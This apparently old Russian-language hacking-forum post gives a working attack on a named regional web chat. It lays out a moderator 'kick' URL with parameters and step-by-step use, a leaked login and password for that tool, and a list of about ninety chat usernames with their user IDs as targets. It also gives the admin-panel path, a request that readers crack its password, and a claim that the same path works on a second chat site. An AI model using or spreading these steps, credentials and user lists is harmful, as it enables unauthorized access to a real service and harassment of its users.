ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ЛЮди ХАЙ!!!
Нуна ваша помощь.
Мы почти взломали чат-сабж.
Но ОЛЛ нужна твоя помощь.
Я и моя команда смогли сломать пушку модеров.
Поэтому я выкладываю её сюда.

В сторку браузера вводим:

http://leschat.lipetsk.ru/adm/gun/gun.php?uid=<тут номер юзера>&login=<тут имя юзера>&sid=<ваш сид из чата>&admin_name=<имя того кто выкидывает>

Принцип таков.
1. Грузим лес чат (http://leschat.lipetsk.ru)
2. Регимся, входим в чат.
3. Копируем сторку преведённую выше, в строку браузера.
4. Ставим нужные данные в эту строку.
5. Потом проходим аунтефикацию по имени и паролю:
   login:       karina
   password: flanela
6. Потом паф, и всё.

Пример реально работающей строки:

http://leschat.lipetsk.ru/adm....e=DeAth
Только sid, меняется при входе в чат, и он индивидуален для каждого юзера.

Дело в том, что у нас очень мало uid-ов юзеров.
Но вот некоторые из них:

BIG_RASTA,47262
Desper81,25580
Egoist,47586
Gunter,47585
Marla,44203
PashaNJ,32774
Plackser,32435
The_heartless,47109
Troyan,44907
ValenOK,47293
White_Sky,46865
Winger,26401
covax,44639
docent,47583
err0r,43537
romantik,36058
shurup,35282
tOSHA,34798
tosha,44424
колючка,45171
Дальнобойщик,47407
Грустный_W,47581
Рыженькая,42776
СЕРГУНЕНОК,44633
-TRINITY-,46660
ASDOS,34470
Greatski,2108
Hippy,47598
TRETIAK,41638
Trouble,39647
Woody,45952
garry,47599
here,37364
kukla,44131
remumba,47596
3ve3do4et,42686
Vaal,34202
Boogie,102
DESTROY,35578
Jardin,108
Lada,44119
Lighthammer,40020
Scalli,34009
Scully,1244
White-Sky,46865
ZED,35573
am,5693
kpd,44320
Друг_Перца,374
МБНБ,46318
Morpheus,43507
ИРЭН,487
Lisky,45579
Miss,333
PeaceDeadЦ,45176
Woland,6935
alenka-13,47335
serge,40982
Mephisto_with_Scalli,47304
PANDAEMONAEON,140
БиБи,47308
КоТеНоК,16293
RADISTKA,42402
Shadow_kille,21118
Sweety,41748
кот13,46724
АССОЛЬ,6947
ДPЯНЬ,47336
mobidik,45472
молчун,46698
Dude,41866
ВЕТЕР,21069
Fantom,34812
GRIG,42739
Harley,20452
RSN,46511
кrestiк,43866
Антихрист,283
Дубыня,14665
Здесь_Я,1144
Шмель,809
Dalnoboy,33376
delf-in,45431
morella,41293
Ааз,879
B52,20104
Oxane,47474
Snowy,37596
Tsika,47488
rilo,47520
Андрюха,170
Мадемуазель,40615
Ведьмочка,18318

Но это только самые завсегдатые чата.

Если вы даже не знаете uid, то можно стрельнуть холостым, то есть подставить просто наугад uid, и робот чата напишет что тот то тот то выкинут, хотя он будет в чате.

login= Тот кого выкидываем
sid= Строка из браузера когда войдёте в чат.
admin_name= Тут пишите всё что угодно.

Но это ещё не всё!!!!!!!
Мы смогли найти скрипт выполняющий вход в админ центр.
Вот путь к нему:
http://leschat.lipetsk.ru/admin/admin.php

Тут нужно только подобрать пароль и всё, чат станет полной ДЫРОЙ!!!
Кстати таже строка используется и для  realchat.ru
http://www.realchat.ru/admin/admin.php?&sid=<ваш сид из реал чата>
Но в реал чате, надо ещё какието данные передать, для входа в админцентр.

Так, что если кто может сломайте пароли к админцентру leschat.lipetsk.ru

Кстати, имя админа чата Mizgun

Ладно, успехов тебе олл, во взломе лесного чата

Если будут какие нибудь новости по взлому, то выкладывайте их в форум или мне на мыло, а я размещу их в инете!

Моё мыло: onlymail@yandex.ru

Лес чат мастдай.